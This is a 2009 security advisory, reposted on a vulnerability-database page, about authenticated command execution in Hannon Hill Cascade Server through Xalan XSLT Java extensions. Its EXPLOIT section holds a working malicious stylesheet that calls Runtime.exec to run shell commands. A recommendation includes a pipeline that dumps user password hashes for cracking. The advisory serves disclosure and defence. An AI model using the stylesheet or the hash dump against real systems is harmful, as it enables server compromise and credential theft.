Command Execution in Hannon Hill Cascade Server

2009.03.20
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


Ogólna skala CVSS: 9/10
Znaczenie: 10/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

Emory University UTS Security Advisory EMORY-2009-01 Topic: Command Execution in Hannon Hill Cascade Server Original release date: March 19, 2009 SUMMARY ======= Hannon Hill's Cascade Server product is vulnerable to a command execution vulnerability. An attacker with access to an unprivileged account within Cascade Server could exploit this vulnerability to run arbitrary commands on the system with the privileges of the user who started Cascade Server. AFFECTED SOFTWARE ================= * Cascade Server, all versions IMPACT ====== An attacker with access to an unprivileged account within Cascade Server could exploit this vulnerability to run arbitrary commands on the system with the privileges of the user who started Cascade Server. The privileges of that user are necessarily sufficient to gain full administrative control of Cascade Server - elevate privileges, conduct denial of service, etc. DETAILS ======= Cascade Server allows its users to write XSLT stylesheets which it uses to transform XML source data into HTML or other formats. Cascade Server employs the Apache XML Project's Xalan-Java XSLT processor to perform these transformations. The Xalan-Java site states, "For those situations where you would like to augment the functionality of XSLT with calls to a procedural language, Xalan-Java supports the creation and use of extension elements and extension functions... Extensions written in Java are directly supported by Xalan-Java." Because Cascade Server does not restrict the kind of XSLT code users are able to enter, any user with access to edit XSLT stylesheets can cause Cascade Server to execute arbitrary Java code. Using the java.lang.Runtime class, Java can run shell commands. While the privilege level of the Cascade Server process may prevent an attacker from gaining complete control of the host system, that privilege level is necessarily sufficient to gain full control of Cascade Server. SOLUTION ======== No full solution exists at this time, but see Recommendations, below. Hannon Hill is working to develop an official solution, and customers may wish to monitor its progress using the Hannon Hill ticketing system (requires a customer account). http://support.hannonhill.com/browse/CSCD-4753 RECOMMENDATIONS =============== It may be possible to limit exposure in the following ways: * Grant the ability to edit XSLT files only to trusted users. * Enforce strong passwords for accounts with XSLT editing privileges. Cascade stores user passwords as base64 encoded SHA1 hashes in the password field of the cxml_user table, and can be audited with any SHA1-capable password cracker. For example, to extract hashes from a MySQL database in a form useable by John the Ripper's (http://www.openwall.com/john/) raw-sha1 format: echo "select userName, password from cxml_user" \ | mysql cascade \ | perl -i -ne 'use MIME::Base64; /^(.*?)\t(.*)/ && print "$1:" . unpack("H*", decode_base64($2))."\n"' * Run Cascade Server as a user with as few privileges as possible. * On UNIX systems, run Cascade Server in a chroot environment. EXPLOIT ======= This exploit example assumes the ability to create and edit blocks, stylesheets, and pages. It's also possible to exploit the vulnerability simply by modifying an existing stylesheet. Create a stylesheet with the following contents: <?xml version="1.0"?> <xsl:stylesheet exclude-result-prefixes="java" version="1.0" xmlns:bufferedreader="xalan://java.io.BufferedReader" xmlns:inputstreamreader="xalan://java.io.InputStreamReader" xmlns:java="http://xml.apache.org/xalan/java" xmlns:process="xalan://java.lang.Process" xmlns:runtime="xalan://java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:variable name="runtime" select="runtime:getRuntime()"/> <xsl:template match="//command"> <xsl:variable name="process" select="runtime:exec($runtime, string(.))"/> <xsl:variable name="inputstream" select="process:getInputStream($process)"/> <xsl:variable name="inputstreamreader" select="inputstreamreader:new($inputstream)"/> <xsl:variable name="bufferedreader" select="bufferedreader:new($inputstreamreader)"/> <p> Output: <xsl:value-of select="bufferedreader:readLine($bufferedreader)"/><br/> </p> </xsl:template> </xsl:stylesheet> Create an XML block with the following contents, substituting your own command or commands. <command>id</command> <command>uname -a</command> ... Create or edit a page using a template with at least one region defined. Under the configuration tab, set Block to point to your XML block and Stylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet. View the layout or preview tab for that page, and you should see the output of your commands. Note that the above stylesheet is only able to display the first line of output. ACKNOWLEDGMENTS =============== Thanks to Bradley Wagner and Hannon Hill in general for their quick initial response to the problem. Thanks to Amy Liu and Brett Goodwin of Hannon Hill for their "Advanced XSLT" talk at the 2008 Cascade Server User's Conference, which inspired this research. DISCLAIMER ========== The information in this advisory is provided by Emory as a courtesy and without any representations or warranties. Recipients are advised to conduct their own investigation and due diligence before relying on its contents. VULNERABILTY HISTORY ==================== 2008-10-01 Vulnerability discovered Hannon Hill notified Ticket opened in Hannon Hill issue tracker 2008-10-15 Hannon Hill staff member assigned to the issue 2009-02-23 Hannon Hill staff member reassigned 2009-03-19 Initial revision of advisory published

Referencje:

http://xforce.iss.net/xforce/xfdb/49332
http://www.securityfocus.com/bid/34186
http://www.securityfocus.com/archive/1/archive/1/501981/100/0/threaded
http://www.milw0rm.com/exploits/8247


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